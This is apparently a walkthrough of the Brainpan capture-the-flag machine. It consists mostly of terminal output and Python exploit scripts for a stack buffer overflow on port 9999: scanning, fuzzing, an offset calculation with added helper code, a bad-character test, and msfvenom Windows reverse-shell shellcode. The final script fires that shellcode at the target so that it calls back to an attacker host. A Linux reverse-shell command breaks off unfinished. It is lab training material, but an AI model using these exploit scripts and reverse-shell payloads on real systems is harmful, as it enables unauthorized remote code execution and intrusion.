┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p9999,10000 10.10.220.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:51 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=1/14%Time=65A3A090%P=x86_64-pc-linux-gnu%r
SF:(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|
SF:_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x
SF:20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x2
SF:0\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x2
SF:0\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPA
SF:N\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTE
SF:R\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.11 seconds
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.10.220.161:10000/FUZZ -recursion
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.220.161:10000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 276ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
[Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# on atleast 2 different hosts [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1038ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1040ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1061ms]
# Copyright 2007 James Fisher [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1062ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1065ms]
bin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 272ms]
[INFO] Adding a new job to the queue: http://10.10.220.161:10000/bin/FUZZ
import sys, socket
from time import sleep

# Start with 100 bytes and grow the input by 100 bytes per round until the
# service stops accepting connections, which marks the crash size.
buffer = "A" * 100

while True:
    try:
        payload = buffer + '\r\n'
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.137.143', 9999))
        print("[+] Sending the payload...\n" + str(len(buffer)))
        s.send(payload.encode())
        s.close()
        sleep(1)
        buffer = buffer + "A" * 100
    except:
        # The connection fails once the service has crashed on the previous input.
        print("The fuzzing crashed at %s bytes" % str(len(buffer)))
        sys.exit()
import sys, socket
buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()
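The page sends the 1000-byte cyclic pattern and then, in the next script, uses an offset of 524 without showing how that number was read off. The following is an added example, not code from the original writeup: it rebuilds the same `Aa0Aa1…` pattern scheme that msf-pattern_create emits, and `pattern_offset` does what msf-pattern_offset does, turning the 32-bit EIP value shown by the debugger back into the four bytes that were sent and locating them. The EIP value used in the demo (0x35724134) is constructed from the pattern itself at offset 524, not quoted from the page. `little_endian` shows why the address in the later scripts is written with its low byte first.

```python
import string
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Build the non-repeating 'Aa0Aa1Aa2...' sequence (the msf-pattern_create
    scheme), truncated to `length` bytes. The full space is 26*26*10 triples."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte pattern space")


def pattern_offset(pattern: bytes, eip_value: int) -> Optional[int]:
    """Locate the four pattern bytes that ended up in EIP.
    The debugger shows EIP as a 32-bit number; on a little-endian target the
    lowest byte was sent first, so pack it back into send order, then search."""
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    return idx if idx != -1 else None


def little_endian(address: int) -> bytes:
    """Pack a 32-bit address in the byte order it must occupy in the input buffer."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    pat = pattern_create(1000)  # the pattern on this page is 1000 bytes long
    # Constructed: the EIP value one would read after sending `pat`, assuming the
    # saved return address starts 524 bytes into the input (the page's offset).
    observed_eip = struct.unpack("<I", pat[524:528])[0]
    print(hex(observed_eip))                  # 0x35724134
    print(pattern_offset(pat, observed_eip))  # 524
    print(little_endian(0x311712F3))          # b'\xf3\x12\x17\x31'
```

The search is only meaningful because every 4-byte window of the pattern is unique within the 20280-byte space; a pattern longer than that repeats and the reported offset becomes ambiguous.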
import sys, socket

# 524 bytes of filler reach the saved return address; the next 4 bytes land in EIP.
# If the debugger shows EIP = 42424242 ("BBBB"), the offset is confirmed and EIP is under our control.
buffer = "A" * 524 + "B" * 4

print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143', 9999))
s.send(payload.encode())
s.close()
Restart the target process in Immunity Debugger, then run exploit.py again.
import sys, socket

# 524 bytes reach the saved return address; "BBBB" is the placeholder EIP value.
buffer = b"A" * 524 + b"B" * 4

# Every byte value except 0x00, which terminates C strings and is assumed bad from the start.
# These must be bytes literals: str.encode() would turn \x80-\xff into two-byte UTF-8
# sequences, and the bytes seen in the debugger would no longer line up with what was sent.
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

print("Sending payload...")
payload = buffer + badchars + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143', 9999))
s.send(payload)
s.close()
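The bad-character round above sends every value 0x01 to 0xff and then relies on eyeballing the stack in the debugger; the page's conclusion is that only 0x00 has to be excluded (the later msfvenom commands use `-b "\x00"`). Here is an added example of that comparison done programmatically; it is not code from the writeup. It assumes the bytes read back from memory are available as a `bytes` object (in practice, a dump copied from the debugger); the three dumps used in the demo are constructed to show the three ways a byte can misbehave: cut the copy short, be replaced in place, or be dropped so that everything after it shifts.

```python
from typing import List, Optional, Tuple


def candidate_bytes(exclude=(0x00,)) -> bytes:
    """Every byte value except those already known to break the input path.
    0x00 is excluded up front because it terminates C strings."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(sent: bytes, observed: bytes) -> List[Tuple[int, int, Optional[int]]]:
    """Compare the candidate sequence as sent with the bytes read back from memory.
    Returns (offset, sent_byte, observed_byte) per problem; observed_byte is None
    when the copy was cut short at that offset. Stops once alignment is lost,
    because nothing after a truncation or a dropped byte can be judged."""
    mismatches = []
    for i, b in enumerate(sent):
        if i >= len(observed):
            mismatches.append((i, b, None))  # copy truncated here
            break
        if observed[i] != b:
            mismatches.append((i, b, observed[i]))
            # If the following bytes line up with sent[i+1:], this byte was dropped
            # rather than altered, and every later offset is shifted: stop here.
            if observed[i:i + 4] == sent[i + 1:i + 5]:
                break
    return mismatches


def bad_values(sent: bytes, observed: bytes) -> List[int]:
    """Byte values to remove from the candidate set before the next round."""
    return sorted({b for _, b, _ in find_bad_chars(sent, observed)})


if __name__ == "__main__":
    sent = candidate_bytes()
    # Constructed memory dumps (not taken from the target):
    clean = bytes(sent)                               # nothing altered
    truncated = sent[:sent.index(0x0a)]               # copy stopped at the newline
    replaced = sent.replace(b"\x0d", b"\x20")         # 0x0d rewritten as a space
    dropped = sent[:9] + sent[10:]                    # 0x0a removed, rest shifted
    print(bad_values(sent, clean))      # []
    print(bad_values(sent, truncated))  # [10]
    print(bad_values(sent, replaced))   # [13]
    print(bad_values(sent, dropped))    # [10]
```

The procedure is iterative: remove the reported values from the candidate set, send the shorter sequence again, and compare again until the list comes back empty. A single round can hide a second bad character behind the first, which is why the function stops rather than guessing once alignment is lost.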
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.137.133 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
"\x36";
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
b"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
b"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
b"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
b"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
b"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
b"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
b"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
b"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
b"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
b"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
b"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
b"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
b"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
b"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
b"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
b"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
b"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
b"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
b"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
b"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
b"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
b"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
b"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
b"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
b"\x36")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.252.53 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
"\xda";
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
b"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
b"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
b"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
b"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
b"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
b"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
b"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
b"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
b"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
b"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
b"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
b"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
b"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
b"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
b"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
b"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
b"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
b"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
b"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
b"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
b"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
b"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
b"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
b"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
b"\xda")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.220.161',9999))
s.send(payload)
s.close()
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.8.252.53 LPORT=5555 -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
